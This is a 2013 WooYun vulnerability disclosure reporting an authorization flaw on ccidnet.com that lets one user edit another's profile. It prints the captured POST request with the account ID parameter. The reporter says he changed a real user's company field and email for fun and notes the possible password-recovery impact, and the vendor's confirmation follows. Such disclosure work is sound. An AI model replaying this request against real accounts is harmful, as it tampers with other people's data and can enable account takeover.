当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044416

漏洞标题:赛迪网官网越权可修改他人关键信息

相关厂商:赛迪网

漏洞作者: sql

提交时间:2013-11-29 14:16

修复时间:2014-01-13 14:17

公开时间:2014-01-13 14:17

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-29: 细节已通知厂商并且等待厂商处理中
2013-11-29: 厂商已经确认,细节仅向厂商公开
2013-12-09: 细节向核心白帽子及相关领域专家公开
2013-12-19: 细节向普通白帽子公开
2013-12-29: 细节向实习白帽子公开
2014-01-13: 细节向公众公开

简要描述:

rt

详细说明:

我也发个越权的。
我先注册一个号修改自己的资料,抓包得到。
post
http://register.ccidnet.com/passport/passport
action=5&accountID=2712091&accountName=sqlwooyun&email=sqlwooyun%40126.com&phone=&companyname=%C3%C0%C5%AE%A3%AC%C4%E3%BA%C3+%CE%D2%CF%EB%BA%CD%C4%E3%D7%F6%C5%F3%D3%D1%A1%A3&vocation=-1&job=-1&leadship=-1&chinesename=&sex=-1&birthday=&education=-1&oicq=&msn=&mobile=&firstnet=1&idtype=1&id=&salary=-1&homepage=&companyscale=-1&companytype=-1&business=&country=%D6%D0%B9%FA&province=%C7%EB%D1%A1%D4%F1%CA%A1%B7%DD%C3%FB&city=%C7%EB%D1%A1%D4%F1%B3%C7%CA%D0%C3%FB&address=%C3%C0%C5%AE%A3%AC%C4%E3%BA%C3+%CE%D2%CF%EB%BA%CD%C4%E3%D7%F6%C5%F3%D3%D1%A1%A3&zipcode=
然后我修改accountName 是sqlwooyun1的账号。

2222.jpg


哈哈 我把他的单位 改成了 :美女,你好,我想和你做朋友。
email我也给他改了。
哈哈,挺好玩的。

漏洞证明:

如上,不知email是否会影响到该用户的密码取回,希望检查。

修复方案:

加强权限控制

版权声明:转载请注明来源 sql@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-11-29 15:31

厂商回复:

谢谢提醒,已经着手处理

最新状态:

暂无


漏洞评价:

评论